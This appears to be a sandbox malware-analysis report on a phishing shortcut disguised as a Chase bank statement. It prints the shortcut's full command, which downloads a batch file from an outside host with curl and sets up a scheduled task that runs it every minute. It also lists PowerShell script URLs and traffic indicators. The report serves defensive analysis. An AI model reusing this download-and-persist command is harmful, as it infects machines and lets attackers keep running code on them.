Source: unknown; HTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: Joe Sandbox View; ASN Name: COGECO-PEER1CA COGECO-PEER1CA
Source: Joe Sandbox View; JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: admiralpub.ca; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: admiralpub.ca; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: admiralpub.ca; Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2017/olympiadic.php HTTP/1.1; Host: admiralpub.ca; User-Agent: curl/7.83.1; Accept: */*
Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: admiralpub.ca; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: admiralpub.ca; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /wp-content/uploads/2017/oligophosphaturia.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: admiralpub.ca; Connection: Keep-Alive
Source: unknown; DNS traffic detected: queries for: admiralpub.ca
Source: powershell.exe, 00000007.00000002.2038635027.0000023F44644000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A015D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD015D0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://admiralpub.ca
Source: powershell.exe, 0000000E.00000002.2260297974.0000027A686B6000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m
Source: powershell.exe, 00000015.00000002.2894258629.000002AD6D655000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoft8
Source: powershell.exe, 00000007.00000002.2053029650.0000023F530ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2053029650.0000023F53223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2038635027.0000023F44A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD101AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000015.00000002.2794129029.000002AD0186F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2896152779.000002AD6F486000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.2038635027.0000023F43071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD00001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2038635027.0000023F446B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD0163D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000015.00000002.2794129029.000002AD0186F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2896152779.000002AD6F486000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.2038635027.0000023F43C9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00C2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD01339000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://admiralpub.ca
Source: powershell.exe, 00000007.00000002.2038635027.0000023F4467C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD01608000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://admiralpub.ca/wp-content/
Source: wscript.exe, 00000018.00000002.2818480339.00000217B93B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000002.2818354957.00000217B91BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817698308.00000217B91AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817679859.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817938071.00000217B91BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B919C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, EGLG6DJOY9K9.js.7.dr; String found in binary or memory: https://admiralpub.ca/wp-content/uploads/2017/agent1.ps1
Source: wscript.exe, 00000018.00000002.2818480339.00000217B93B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000002.2818354957.00000217B91BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817698308.00000217B91AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817679859.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817938071.00000217B91BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B919C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, EGLG6DJOY9K9.js.7.dr; String found in binary or memory: https://admiralpub.ca/wp-content/uploads/2017/agent3.ps1
Source: powershell.exe, 00000015.00000002.2794129029.000002AD01608000.00000004.00000800.00020000.00000000.sdmp, Pfx5CcXoK0qm.bat.2.dr; String found in binary or memory: https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php
Source: curl.exe, 00000002.00000002.1984030608.00000258B0F87000.00000004.00000020.00020000.00000000.sdmp, chasebank_statement_mar.lnk; String found in binary or memory: https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php
Source: curl.exe, 00000002.00000002.1984030608.00000258B0F87000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phpY
Source: curl.exe, 00000002.00000002.1984030608.00000258B0F87000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phplW
Source: powershell.exe, 00000007.00000002.2038635027.0000023F43071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD00001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000015.00000002.2794129029.000002AD0186F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2896152779.000002AD6F486000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2038635027.0000023F43C9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00C2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD00C2C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2053029650.0000023F530ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2053029650.0000023F53223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2038635027.0000023F44A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD101AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000007.00000002.2038635027.0000023F446B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD0163D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000007.00000002.2038635027.0000023F446B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD0163D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.orgX
Source: unknown; Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown; Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown; HTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 103.26.141.28:443 -> 192.168.2.5:49719 version: TLS 1.2

System Summary

Source: Initial fileStrings: https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
Source: chasebank_statement_mar.lnkLNK file: /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'%tmp%\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
